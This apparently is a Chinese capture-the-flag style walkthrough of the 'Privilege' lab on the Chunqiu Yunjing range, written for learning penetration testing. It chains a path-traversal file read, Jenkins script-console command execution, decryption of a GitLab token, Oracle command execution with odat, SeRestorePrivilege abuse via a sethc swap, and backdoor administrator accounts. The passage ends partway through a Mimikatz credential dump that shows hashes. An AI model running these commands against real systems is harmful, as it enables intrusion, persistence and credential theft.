春秋云境-Privilege

Ca1m

2025-03-13

内网攻防

域

Privilege

先来看一下考点和提示

1
2

关卡1剧情：
请获取 XR Shop 官网源码的备份文件，并尝试获得系统上任意文件读取的能力。并且，管理员在配置 Jenkins 时，仍然选择了使用初始管理员密码，请尝试读取该密码并获取 Jenkins 服务器权限。Jenkins 配置目录为C:\ProgramData\Jenkins\.jenkins。

1
2

关卡2剧情：
管理员为 Jenkins 配置了 Gitlab，请尝试获取 Gitlab API Token，并最终获取 Gitlab 中的敏感仓库。获取敏感信息后，尝试连接至 Oracle 数据库，并获取 ORACLE 服务器控制权限。

1 2	关卡3剧情：攻击办公区内网，获取办公 PC 控制权限，并通过特权滥用提升至 SYSTEM 权限。

1 2	关卡4剧情：尝试接管备份管理操作员帐户，并通过转储 NTDS 获得域管理员权限，最终控制整个域环境。

外网打点

先fscan扫一下

fscan.exe -h 39.99.138.22

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.99.138.22:8080 open
39.99.138.22:3306 open
39.99.138.22:80 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://39.99.138.22:8080  code:403 len:548    title:None
[*] WebTitle http://39.99.138.22       code:200 len:54646  title:XR SHOP
已完成 3/3
[*] 扫描结束,耗时: 48.1700178s

80端口是wordpress

扫一下目录，上dirsearch

[16:20:36] Starting:
[16:20:46] 301 -    0B  - /%2e%2e//google.com  ->  http://39.99.138.22/%2E%2E/google.com
[16:22:14] 301 -    0B  - /0  ->  http://39.99.138.22/
[16:22:30] 301 -    0B  - /2022  ->  http://39.99.138.22/2022/
[16:22:31] 200 -   56KB - /2022/
[16:23:16] 301 -    0B  - /adm/index.php  ->  http://39.99.138.22/adm/
[16:23:17] 302 -    0B  - /admin  ->  http://39.99.138.22/wp-admin/
[16:23:22] 301 -    0B  - /admin.  ->  http://39.99.138.22/admin
[16:23:24] 302 -    0B  - /admin/  ->  http://39.99.138.22/wp-admin/
[16:23:31] 301 -    0B  - /admin/index.php  ->  http://39.99.138.22/admin/
[16:23:34] 301 -    0B  - /admin/mysql/index.php  ->  http://39.99.138.22/admin/mysql/
[16:23:34] 301 -    0B  - /admin/mysql2/index.php  ->  http://39.99.138.22/admin/mysql2/
[16:23:34] 301 -    0B  - /admin/phpMyAdmin/index.php  ->  http://39.99.138.22/admin/phpMyAdmin/
[16:23:34] 301 -    0B  - /admin/phpmyadmin/index.php  ->  http://39.99.138.22/admin/phpmyadmin/
[16:23:34] 301 -    0B  - /admin/phpmyadmin2/index.php  ->  http://39.99.138.22/admin/phpmyadmin2/
[16:23:35] 301 -    0B  - /admin/PMA/index.php  ->  http://39.99.138.22/admin/PMA/
[16:23:35] 301 -    0B  - /admin/pma/index.php  ->  http://39.99.138.22/admin/pma/
[16:23:37] 301 -    0B  - /admin2/index.php  ->  http://39.99.138.22/admin2/
[16:23:44] 301 -    0B  - /admin_area/index.php  ->  http://39.99.138.22/admin_area/
[16:24:19] 301 -    0B  - /adminarea/index.php  ->  http://39.99.138.22/adminarea/
[16:24:24] 301 -    0B  - /admincp/index.php  ->  http://39.99.138.22/admincp/
[16:24:27] 301 -    0B  - /adminer/index.php  ->  http://39.99.138.22/adminer/
[16:24:37] 301 -    0B  - /administrator/index.php  ->  http://39.99.138.22/administrator/
[16:24:59] 301 -    0B  - /apc/index.php  ->  http://39.99.138.22/apc/
[16:25:15] 301 -    0B  - /asset..  ->  http://39.99.138.22/asset
[16:25:16] 301 -    0B  - /atom  ->  http://39.99.138.22/feed/atom/
[16:25:22] 301 -    0B  - /axis//happyaxis.jsp  ->  http://39.99.138.22/axis/happyaxis.jsp
[16:25:22] 301 -    0B  - /axis2-web//HappyAxis.jsp  ->  http://39.99.138.22/axis2-web/HappyAxis.jsp
[16:25:22] 301 -    0B  - /axis2//axis2-web/HappyAxis.jsp  ->  http://39.99.138.22/axis2/axis2-web/HappyAxis.jsp
[16:25:28] 301 -    0B  - /banner2  ->  http://39.99.138.22/banner2/
[16:25:29] 301 -    0B  - /bb-admin/index.php  ->  http://39.99.138.22/bb-admin/
[16:25:35] 301 -    0B  - /bitrix/admin/index.php  ->  http://39.99.138.22/bitrix/admin/
[16:25:59] 301 -    0B  - /Citrix//AccessPlatform/auth/clientscripts/cookies.js  ->  http://39.99.138.22/Citrix/AccessPlatform/auth/clientscripts/cookies.js
[16:26:00] 301 -    0B  - /claroline/phpMyAdmin/index.php  ->  http://39.99.138.22/claroline/phpMyAdmin/
[16:26:36] 302 -    0B  - /dashboard  ->  http://39.99.138.22/wp-admin/
[16:26:37] 302 -    0B  - /dashboard/  ->  http://39.99.138.22/wp-admin/
[16:26:42] 301 -    0B  - /db/index.php  ->  http://39.99.138.22/db/
[16:26:44] 301 -    0B  - /dbadmin/index.php  ->  http://39.99.138.22/dbadmin/
[16:27:09] 301 -    0B  - /engine/classes/swfupload//swfupload.swf  ->  http://39.99.138.22/engine/classes/swfupload/swfupload.swf
[16:27:09] 301 -    0B  - /engine/classes/swfupload//swfupload_f9.swf  ->  http://39.99.138.22/engine/classes/swfupload/swfupload_f9.swf
[16:27:15] 301 -    0B  - /etc/lib/pChart2/examples/imageMap/index.php  ->  http://39.99.138.22/etc/lib/pChart2/examples/imageMap/
[16:27:21] 301 -    0B  - /extjs/resources//charts.swf  ->  http://39.99.138.22/extjs/resources/charts.swf
[16:27:23] 302 -    0B  - /favicon.ico  ->  http://39.99.138.22/wp-includes/images/w-logo-blue-white-bg.png
[16:27:25] 301 -    0B  - /feed  ->  http://39.99.138.22/feed/
[16:27:50] 301 -    0B  - /h  ->  http://39.99.138.22/2022/12/25/hello-world/
[16:27:53] 301 -    0B  - /hello  ->  http://39.99.138.22/2022/12/25/hello-world/
[16:27:58] 301 -    0B  - /html/js/misc/swfupload//swfupload.swf  ->  http://39.99.138.22/html/js/misc/swfupload/swfupload.swf
[16:28:10] 301 -    0B  - /index.php  ->  http://39.99.138.22/
[16:28:12] 301 -    0B  - /index.php/login/  ->  http://39.99.138.22/login/
[16:28:18] 301 -    0B  - /install/index.php?upgrade/  ->  http://39.99.138.22/install/?upgrade/
[16:28:25] 301 -    0B  - /jkstatus;  ->  http://39.99.138.22/jkstatus
[16:28:38] 200 -   19KB - /LICENSE.txt
[16:28:38] 200 -   19KB - /license.txt
[16:28:48] 302 -    0B  - /login  ->  http://39.99.138.22/wp-login.php
[16:28:49] 301 -    0B  - /login.wdm%20  ->  http://39.99.138.22/login.wdm
[16:28:49] 301 -    0B  - /login.wdm%2e  ->  http://39.99.138.22/login.wdm
[16:28:49] 302 -    0B  - /login/  ->  http://39.99.138.22/wp-login.php
[16:29:19] 301 -    0B  - /modelsearch/index.php  ->  http://39.99.138.22/modelsearch/
[16:29:27] 301 -    0B  - /myadmin/index.php  ->  http://39.99.138.22/myadmin/
[16:29:27] 301 -    0B  - /myadmin2/index.php  ->  http://39.99.138.22/myadmin2/
[16:29:28] 301 -    0B  - /mysql-admin/index.php  ->  http://39.99.138.22/mysql-admin/
[16:29:29] 301 -    0B  - /mysql/index.php  ->  http://39.99.138.22/mysql/
[16:29:30] 301 -    0B  - /mysqladmin/index.php  ->  http://39.99.138.22/mysqladmin/
[16:29:32] 301 -    0B  - /New%20folder%20(2)  ->  http://39.99.138.22/New%20folder%20(2
[16:29:52] 301 -    0B  - /panel-administracion/index.php  ->  http://39.99.138.22/panel-administracion/
[16:30:02] 301 -    0B  - /phpadmin/index.php  ->  http://39.99.138.22/phpadmin/
[16:30:04] 301 -    0B  - /phpma/index.php  ->  http://39.99.138.22/phpma/
[16:30:06] 301 -    0B  - /phpmyadmin!!  ->  http://39.99.138.22/phpmyadmin
[16:30:16] 301 -    0B  - /phpmyadmin-old/index.php  ->  http://39.99.138.22/phpmyadmin-old/
[16:30:17] 301 -    0B  - /phpMyAdmin.old/index.php  ->  http://39.99.138.22/phpMyAdmin.old/
[16:30:17] 301 -    0B  - /phpMyAdmin/index.php  ->  http://39.99.138.22/phpMyAdmin/
[16:30:17] 301 -    0B  - /phpmyadmin/index.php  ->  http://39.99.138.22/phpmyadmin/
[16:30:17] 301 -    0B  - /phpMyAdmin/phpMyAdmin/index.php  ->  http://39.99.138.22/phpMyAdmin/phpMyAdmin/
[16:30:17] 301 -    0B  - /phpmyadmin/phpmyadmin/index.php  ->  http://39.99.138.22/phpmyadmin/phpmyadmin/
[16:30:18] 301 -    0B  - /phpmyadmin0/index.php  ->  http://39.99.138.22/phpmyadmin0/
[16:30:18] 301 -    0B  - /phpmyadmin1/index.php  ->  http://39.99.138.22/phpmyadmin1/
[16:30:18] 301 -    0B  - /phpmyadmin2/index.php  ->  http://39.99.138.22/phpmyadmin2/
[16:30:19] 301 -    0B  - /phpMyadmin_bak/index.php  ->  http://39.99.138.22/phpMyadmin_bak/
[16:30:19] 301 -    0B  - /phpMyAdminold/index.php  ->  http://39.99.138.22/phpMyAdminold/
[16:30:25] 301 -    0B  - /pma-old/index.php  ->  http://39.99.138.22/pma-old/
[16:30:25] 301 -    0B  - /PMA/index.php  ->  http://39.99.138.22/PMA/
[16:30:25] 301 -    0B  - /pma/index.php  ->  http://39.99.138.22/pma/
[16:30:25] 301 -    0B  - /PMA2/index.php  ->  http://39.99.138.22/PMA2/
[16:30:27] 301 -    0B  - /pmamy/index.php  ->  http://39.99.138.22/pmamy/
[16:30:27] 301 -    0B  - /pmamy2/index.php  ->  http://39.99.138.22/pmamy2/
[16:30:27] 301 -    0B  - /pmd/index.php  ->  http://39.99.138.22/pmd/
[16:30:44] 200 -    7KB - /README.html
[16:30:44] 301 -    0B  - /rating_over.  ->  http://39.99.138.22/rating_over
[16:30:44] 200 -    7KB - /ReadMe.html
[16:30:44] 200 -    7KB - /Readme.html
[16:30:44] 200 -    7KB - /readme.html
[16:30:58] 200 -  112B  - /robots.txt
[16:30:59] 301 -    0B  - /roundcube/index.php  ->  http://39.99.138.22/roundcube/
[16:30:59] 301 -    0B  - /rss  ->  http://39.99.138.22/feed/
[16:31:00] 301 -    0B  - /s  ->  http://39.99.138.22/sample-page/
[16:31:01] 301 -    0B  - /sample  ->  http://39.99.138.22/sample-page/
[16:31:14] 301 -    0B  - /servlet/hello  ->  http://39.99.138.22/2022/12/25/hello-world/
[16:31:28] 301 -    0B  - /siteadmin/index.php  ->  http://39.99.138.22/siteadmin/
[16:31:29] 302 -    0B  - /sitemap.xml  ->  http://39.99.138.22/wp-sitemap.xml
[16:31:37] 301 -    0B  - /sql/index.php  ->  http://39.99.138.22/sql/
[16:31:44] 301 -    0B  - /static..  ->  http://39.99.138.22/static
[16:31:51] 301 -    0B  - /sugarcrm/index.php?module=Accounts&action=ShowDuplicates  ->  http://39.99.138.22/sugarcrm/?module=Accounts&action=ShowDuplicates
[16:31:51] 301 -    0B  - /sugarcrm/index.php?module=Contacts&action=ShowDuplicates  ->  http://39.99.138.22/sugarcrm/?module=Contacts&action=ShowDuplicates
[16:32:06] 301 -    0B  - /templates/beez/index.php  ->  http://39.99.138.22/templates/beez/
[16:32:06] 301 -    0B  - /templates/ja-helio-farsi/index.php  ->  http://39.99.138.22/templates/ja-helio-farsi/
[16:32:06] 301 -    0B  - /templates/rhuk_milkyway/index.php  ->  http://39.99.138.22/templates/rhuk_milkyway/
[16:32:17] 301 -    0B  - /tmp/index.php  ->  http://39.99.138.22/tmp/
[16:32:17] 301 -  234B  - /tools  ->  http://39.99.138.22/tools/
[16:32:17] 200 -    1KB - /tools/
[16:32:19] 301 -    0B  - /tools/phpMyAdmin/index.php  ->  http://39.99.138.22/tools/phpMyAdmin/
[16:32:22] 301 -    0B  - /typo3/phpmyadmin/index.php  ->  http://39.99.138.22/typo3/phpmyadmin/
[16:32:29] 301 -    0B  - /us  ->  http://39.99.138.22/usces-cart/
[16:33:00] 301 -    0B  - /web/phpMyAdmin/index.php  ->  http://39.99.138.22/web/phpMyAdmin/
[16:33:01] 301 -    0B  - /webadmin/index.php  ->  http://39.99.138.22/webadmin/
[16:33:07] 301 -  237B  - /wp-admin  ->  http://39.99.138.22/wp-admin/
[16:33:07] 302 -    0B  - /wp-admin/  ->  http://39.99.138.22/wp-login.php?redirect_to=http%3A%2F%2F39.99.138.22%2Fwp-admin%2F&reauth=1
[16:33:07] 409 -    3KB - /wp-admin/setup-config.php
[16:33:07] 200 -    1KB - /wp-admin/install.php
[16:33:07] 400 -    1B  - /wp-admin/admin-ajax.php
[16:33:09] 200 -    0B  - /wp-config.php
[16:33:10] 301 -  239B  - /wp-content  ->  http://39.99.138.22/wp-content/
[16:33:10] 200 -    0B  - /wp-content/
[16:33:11] 200 -  254B  - /wp-content/plugins/hello.php
[16:33:12] 200 -  710B  - /wp-content/upgrade/
[16:33:12] 200 -    1KB - /wp-content/uploads/
[16:33:12] 301 -    0B  - /wp-content/plugins/adminer/inc/editor/index.php  ->  http://39.99.138.22/wp-content/plugins/adminer/inc/editor/
[16:33:13] 301 -  240B  - /wp-includes  ->  http://39.99.138.22/wp-includes/
[16:33:13] 200 -   55KB - /wp-includes/
[16:33:13] 200 -    0B  - /wp-includes/rss-functions.php
[16:33:14] 200 -    6KB - /wp-login.php
[16:33:15] 200 -    0B  - /wp-cron.php
[16:33:15] 200 -  161KB - /wp-json/
[16:33:15] 200 -  575B  - /wp-json/wp/v2/users/
[16:33:15] 301 -    0B  - /wp-register.php  ->  http://39.99.138.22/wp-login.php?action=register
[16:33:15] 302 -    0B  - /wp-signup.php  ->  http://39.99.138.22/wp-login.php?action=register
[16:33:18] 200 -   36MB - /www.zip
[16:33:18] 301 -    0B  - /www/phpMyAdmin/index.php  ->  http://39.99.138.22/www/phpMyAdmin/
[16:33:18] 405 -   42B  - /xmlrpc.php
[16:33:19] 301 -    0B  - /xampp/phpmyadmin/index.php  ->  http://39.99.138.22/xampp/phpmyadmin/

看到了www.zip，去看一下源码

看了一下可以直接读文件，读到flag1

1	http://39.99.138.22/tools/content-log.php?logfile=../../../../../../../../../Users/Administrator/flag/flag01.txt

再去读默认配置的密码

1	510235cf43f14e83b88a9f144199655b

去8080的login页面登录admin用户,/manage/script路径下可以命令执行

还是system权限，尝试添加用户

1 2	println "net user calmsec admin@123 /add".execute().text println "net localgroup administrators calmsec /add".execute().text

rdp上去

内网渗透

传个fscan扫一下

fscan.exe -h 172.22.14.0/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
(icmp) Target 172.22.14.7     is alive
(icmp) Target 172.22.14.11    is alive
(icmp) Target 172.22.14.16    is alive
(icmp) Target 172.22.14.31    is alive
(icmp) Target 172.22.14.46    is alive
[*] Icmp alive hosts len is: 5
172.22.14.7:3306 open
172.22.14.31:1521 open
172.22.14.46:445 open
172.22.14.31:445 open
172.22.14.11:445 open
172.22.14.7:445 open
172.22.14.31:139 open
172.22.14.46:139 open
172.22.14.11:139 open
172.22.14.46:135 open
172.22.14.7:139 open
172.22.14.31:135 open
172.22.14.11:135 open
172.22.14.7:135 open
172.22.14.46:80 open
172.22.14.16:80 open
172.22.14.7:80 open
172.22.14.16:22 open
172.22.14.11:88 open
172.22.14.16:8060 open
172.22.14.7:8080 open
172.22.14.16:9094 open
[*] alive ports len is: 22
start vulscan
[*] NetInfo
[*]172.22.14.31
   [->]XR-ORACLE
   [->]172.22.14.31
[*] NetInfo
[*]172.22.14.7
   [->]XR-JENKINS
   [->]172.22.14.7
[*] NetInfo
[*]172.22.14.11
   [->]XR-DC
   [->]172.22.14.11
[*] NetInfo
[*]172.22.14.46
   [->]XR-0923
   [->]172.22.14.46
[*] NetBios 172.22.14.31    WORKGROUP\XR-ORACLE
[*] NetBios 172.22.14.46    XIAORANG\XR-0923
[*] WebTitle http://172.22.14.7:8080   code:403 len:548    title:None
[*] NetBios 172.22.14.11    [+] DC:XIAORANG\XR-DC
[*] WebTitle http://172.22.14.16:8060  code:404 len:555    title:404 Not Found
[*] WebTitle http://172.22.14.46       code:200 len:703    title:IIS Windows Server
[*] WebTitle http://172.22.14.16       code:302 len:99     title:None 跳转url: http://172.22.14.16/users/sign_in
[*] WebTitle http://172.22.14.16/users/sign_in code:200 len:34961  title:Sign in · GitLab
[*] WebTitle http://172.22.14.7        code:200 len:54603  title:XR SHOP
[+] PocScan http://172.22.14.7/www.zip poc-yaml-backup-file
已完成 20/22 [-] ssh 172.22.14.16:22 root !QAZ2wsx ssh: handshake failed: ssh: unable to authenticate, attempted methods [none], no supported methods remain
已完成 22/22

分析一下

172.22.14.7 本机
172.22.14.46 XR-0923
172.22.14.11 XR-DC 域控
172.22.14.31 XR-ORACLE
172.22.14.16 GitLab

提示里说了api，去找一下默认配置地方，发现了api

1	C:/ProgramData/Jenkins/.jenkins/credentials.xml

找到了apitoken，去web界面解密一下

1	println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())

得到明文

1	glpat-7kD_qLH2PiQv_ywB9hz2

搭个代理，有了token就可以去，去用api列出Gitlab项目

1	proxychains curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects"

[{
	"id": 6,
	"description": null,
	"name": "Internal Secret",
	"name_with_namespace": "XRLAB / Internal Secret",
	"path": "internal-secret",
	"path_with_namespace": "xrlab/internal-secret",
	"created_at": "2022-12-25T08:30:12.362Z",
	"default_branch": "main",
	"tag_list": [],
	"topics": [],
	"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/internal-secret.git",
	"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/internal-secret.git",
	"web_url": "http://gitlab.xiaorang.lab/xrlab/internal-secret",
	"readme_url": null,
	"avatar_url": null,
	"forks_count": 0,
	"star_count": 0,
	"last_activity_at": "2022-12-25T08:30:12.362Z",
	"namespace": {
		"id": 8,
		"name": "XRLAB",
		"path": "xrlab",
		"kind": "group",
		"full_path": "xrlab",
		"parent_id": null,
		"avatar_url": null,
		"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
	}
}, {
	"id": 4,
	"description": null,
	"name": "XRAdmin",
	"name_with_namespace": "XRLAB / XRAdmin",
	"path": "xradmin",
	"path_with_namespace": "xrlab/xradmin",
	"created_at": "2022-12-25T07:48:16.751Z",
	"default_branch": "main",
	"tag_list": [],
	"topics": [],
	"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xradmin.git",
	"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xradmin.git",
	"web_url": "http://gitlab.xiaorang.lab/xrlab/xradmin",
	"readme_url": "http://gitlab.xiaorang.lab/xrlab/xradmin/-/blob/main/README.md",
	"avatar_url": null,
	"forks_count": 0,
	"star_count": 0,
	"last_activity_at": "2023-05-30T10:27:31.762Z",
	"namespace": {
		"id": 8,
		"name": "XRLAB",
		"path": "xrlab",
		"kind": "group",
		"full_path": "xrlab",
		"parent_id": null,
		"avatar_url": null,
		"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
	}
}, {
	"id": 3,
	"description": null,
	"name": "Awenode",
	"name_with_namespace": "XRLAB / Awenode",
	"path": "awenode",
	"path_with_namespace": "xrlab/awenode",
	"created_at": "2022-12-25T07:46:43.635Z",
	"default_branch": "master",
	"tag_list": [],
	"topics": [],
	"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/awenode.git",
	"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/awenode.git",
	"web_url": "http://gitlab.xiaorang.lab/xrlab/awenode",
	"readme_url": "http://gitlab.xiaorang.lab/xrlab/awenode/-/blob/master/README.md",
	"avatar_url": null,
	"forks_count": 0,
	"star_count": 0,
	"last_activity_at": "2022-12-25T07:46:43.635Z",
	"namespace": {
		"id": 8,
		"name": "XRLAB",
		"path": "xrlab",
		"kind": "group",
		"full_path": "xrlab",
		"parent_id": null,
		"avatar_url": null,
		"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
	}
}, {
	"id": 2,
	"description": "Example GitBook site using GitLab Pages: https://pages.gitlab.io/gitbook",
	"name": "XRWiki",
	"name_with_namespace": "XRLAB / XRWiki",
	"path": "xrwiki",
	"path_with_namespace": "xrlab/xrwiki",
	"created_at": "2022-12-25T07:44:18.589Z",
	"default_branch": "master",
	"tag_list": [],
	"topics": [],
	"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xrwiki.git",
	"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xrwiki.git",
	"web_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki",
	"readme_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki/-/blob/master/README.md",
	"avatar_url": "http://gitlab.xiaorang.lab/uploads/-/system/project/avatar/2/gitbook.png",
	"forks_count": 0,
	"star_count": 0,
	"last_activity_at": "2022-12-25T07:44:18.589Z",
	"namespace": {
		"id": 8,
		"name": "XRLAB",
		"path": "xrlab",
		"kind": "group",
		"full_path": "xrlab",
		"parent_id": null,
		"avatar_url": null,
		"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
	}
}, {
	"id": 1,
	"description": "This project is automatically generated and helps monitor this GitLab instance. [Learn more](/help/administration/monitoring/gitlab_self_monitoring_project/index).",
	"name": "Monitoring",
	"name_with_namespace": "GitLab Instance / Monitoring",
	"path": "Monitoring",
	"path_with_namespace": "gitlab-instance-23352f48/Monitoring",
	"created_at": "2022-12-25T07:18:20.914Z",
	"default_branch": "main",
	"tag_list": [],
	"topics": [],
	"ssh_url_to_repo": "git@gitlab.xiaorang.lab:gitlab-instance-23352f48/Monitoring.git",
	"http_url_to_repo": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring.git",
	"web_url": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring",
	"readme_url": null,
	"avatar_url": null,
	"forks_count": 0,
	"star_count": 0,
	"last_activity_at": "2022-12-25T07:18:20.914Z",
	"namespace": {
		"id": 2,
		"name": "GitLab Instance",
		"path": "gitlab-instance-23352f48",
		"kind": "group",
		"full_path": "gitlab-instance-23352f48",
		"parent_id": null,
		"avatar_url": null,
		"web_url": "http://gitlab.xiaorang.lab/groups/gitlab-instance-23352f48"
	}
}]

clone

proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xrwiki.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/awenode.git

数据库提权

在xradmin/ruoyi-admin/src/main/resources/application-druid.yml找到Oracle的账号和密码

1
2
3

url: 172.22.14.31:1521/orcl  
username: xradmin  
password: fcMyE8t9E4XdsKf

因为xradmin有DBA权限，用odat就能直接执行命令了，加个账户rdp上去

1
2

proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user calmsec admin@123 /add'
proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators calmsec /add'

再回到上面clone的项目，其中找到了XR-0923的账号密码

1	XR-0923 \| zhangshuai \| wSbEajHzZs

SeRestorePrivilege提权

这边测试了一下，rdp上去和evil-winrm上去发现特权不一样，这里需要用到SeRestorePrivilege提权

1	proxychains evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs

因为有SeRestorePrivilege，所以能无视ACL修改文件或者编辑注册表，类似于之前的放大镜提权，我们可以把cmd.exe重命名为sethc.exe，然后在锁屏界面连按五次shift启动sethc提权

1
2
3

cd C:\windows\system32
ren sethc.exe sethc.bak
ren cmd.exe sethc.exe

去锁屏界面五次shift，提到system权限

先拿flag然后添加个admin账号重新登进去

1
2
3

type C:\Users\Administrator\flag\flag03.txt
net user calmsec qwer1234! /add
net localgroup administrators calmsec /add

Authentication Id : 0 ; 7048218 (00000000:006b8c1a)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/27 17:27:52
SID               : S-1-5-90-0-3
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 92bb9473498c75f05bec862d84167bb8
         * SHA1     : e3e7fed691061091b244e237331388e85c790b1f
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : c5 6d 0f 14 42 3f 4f a9 19 56 7f 72 a8 a6 52 f1 00 7a 75 36 a2 ff bc 83 e4 a1 63 44 88 de 31 7a c0 55 5d 9c 5c 89 4c 2a 34 81 ff e3 7b 62 e9 3d 17 89 ad 0c b2 e4 3f 7e 15 c1 87 e3 3c 69 31 02 0e 07 86 67 8c 58 b1 62 81 88 ff 13 48 cd 02 59 b3 27 4e 7e 3a c8 8e 93 cf e7 f0 e0 78 cb ee ca bc 07 61 81 f1 1c 16 b7 cf 4f 91 6e a3 16 1b 5a fc 9d 0f 50 9c 7d d7 1f 75 53 d8 09 86 8c 3b 2d 54 31 bb fd 73 af ac ca 3a b8 5b e9 b9 7a b4 22 7e bc 9e b0 d2 35 4d 39 03 92 c0 1b 77 a3 59 42 65 bc 21 14 74 e7 33 4e 60 a2 b6 cb 4a 1a e5 6e de bc c3 8f cc da a9 97 78 de d8 8a 46 31 4d 67 3f b2 af 50 ea ac d8 ce b2 0c 1b 6a 36 0d ea f0 0d 89 dd 49 80 99 ba 1d a3 f7 aa ef 93 2c cd 39 96 87 f0 7f 14 ea 1f a0 45 1b 4f 71 a6 4e 4b be
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 7045555 (00000000:006b81b3)
Session           : Interactive from 3
User Name         : UMFD-3
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2025/3/27 17:27:52
SID               : S-1-5-96-0-3
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 92bb9473498c75f05bec862d84167bb8
         * SHA1     : e3e7fed691061091b244e237331388e85c790b1f
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : c5 6d 0f 14 42 3f 4f a9 19 56 7f 72 a8 a6 52 f1 00 7a 75 36 a2 ff bc 83 e4 a1 63 44 88 de 31 7a c0 55 5d 9c 5c 89 4c 2a 34 81 ff e3 7b 62 e9 3d 17 89 ad 0c b2 e4 3f 7e 15 c1 87 e3 3c 69 31 02 0e 07 86 67 8c 58 b1 62 81 88 ff 13 48 cd 02 59 b3 27 4e 7e 3a c8 8e 93 cf e7 f0 e0 78 cb ee ca bc 07 61 81 f1 1c 16 b7 cf 4f 91 6e a3 16 1b 5a fc 9d 0f 50 9c 7d d7 1f 75 53 d8 09 86 8c 3b 2d 54 31 bb fd 73 af ac ca 3a b8 5b e9 b9 7a b4 22 7e bc 9e b0 d2 35 4d 39 03 92 c0 1b 77 a3 59 42 65 bc 21 14 74 e7 33 4e 60 a2 b6 cb 4a 1a e5 6e de bc c3 8f cc da a9 97 78 de d8 8a 46 31 4d 67 3f b2 af 50 ea ac d8 ce b2 0c 1b 6a 36 0d ea f0 0d 89 dd 49 80 99 ba 1d a3 f7 aa ef 93 2c cd 39 96 87 f0 7f 14 ea 1f a0 45 1b 4f 71 a6 4e 4b be
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 5739333 (00000000:00579345)
Session           : RemoteInteractive from 2
User Name         : zhangshuai
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2025/3/27 17:18:14
SID               : S-1-5-21-754105099-1176710061-2177073800-1001
        msv :
         [00000003] Primary
         * Username : zhangshuai
         * Domain   : XR-0923
         * NTLM     : f97d5a4b44b11bc257a63c3f76f18a9a
         * SHA1     : f6ff2714d556240436758527e190e329f05cd43d
        tspkg :
        wdigest :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 3458743 (00000000:0034c6b7)
Session           : Service from 0
User Name         : DefaultAppPool
Domain            : IIS APPPOOL
Logon Server      : (null)
Logon Time        : 2025/3/27 16:48:47
SID               : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 92bb9473498c75f05bec862d84167bb8
         * SHA1     : e3e7fed691061091b244e237331388e85c790b1f
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
